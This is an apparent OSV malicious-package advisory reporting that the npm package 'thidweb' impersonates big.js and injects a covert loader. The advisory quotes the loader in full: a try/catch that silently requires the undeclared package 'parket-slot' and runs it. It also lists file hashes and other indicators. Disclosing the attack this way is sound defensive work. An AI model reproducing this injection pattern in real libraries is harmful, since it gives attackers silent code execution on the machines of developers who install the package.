{"id":"MAL-2026-6343","summary":"Malicious code in thidweb (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d)\nPackage is published as `thidweb` but its README, source comments, repo URL, and author metadata all identify it as big.js v7.0.1 by Mike McLaughlin (README.md line 1 `# big.js`; big.js header `big.js v7.0.1`; package.json repository url `https://github.com/MikeMcl/big.js.git`). The source is a verbatim copy of upstream big.js with a covert loader injected mid-file at big.js:605-609: `try { const doc = require(\"parket-slot\"); doc.from_str().then(e =\u003e { }).catch(e =\u003e { }) } catch (error) { }`. The same block is present in big.mjs. `parket-slot` is not declared in `package.json` dependencies; the only declared dependency is `log-taker@^0.0.9`, which upstream big.js does not require (upstream is dependency-free). Any developer who installs `thidweb` (mistaking it for big.js) and imports it executes whatever code `parket-slot` ships, with errors silently swallowed. The combination of impersonation, undeclared runtime require, error-suppressing try/catch, and an unrelated declared dependency is a multi-stage installer-side code-execution attack.\n","modified":"2026-06-23T21:01:21.969570772Z","published":"2026-06-23T20:01:26Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-007356","source":"amazon-inspector","sha256":"80721058923b3e5963a6ee170007b8b4131ae5093481456ca10e63f52963987d","modified_time":"2026-06-23T20:01:26Z","versions":["0.0.8"],"import_time":"2026-06-23T20:48:30.715119057Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/thidweb/v/0.0.8"}],"affected":[{"package":{"name":"thidweb","ecosystem":"npm","purl":"pkg:npm/thidweb"},"versions":["0.0.8"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"path":"big.js","tlsh":"24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc","sha256":"5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace"},{"path":"package.json","tlsh":"59213463c9a59da70af85ba47c6c03aef1151b1f00a04c17b07b130c4f3345b2096b7d","sha256":"b45b4819897cf8421385b6cba4fb1ab287a762cc7d979c79041298202d02d7e4"}],"package_integrity":[{"filename":"thidweb-0.0.8.tgz","hashes":{"sha1":"04e7457d06345536d4bd78c9e0a34e5598ac5ecc","sha512_sri":"sha512-YU0zyLSumbR4vpqZ5emFW3M5I38jX4DtdP/xKPTNoj97robUvHd46iJvHKi5lyJjC77yYBJjtQRtOFmCnmGUXw=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/thidweb/MAL-2026-6343.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}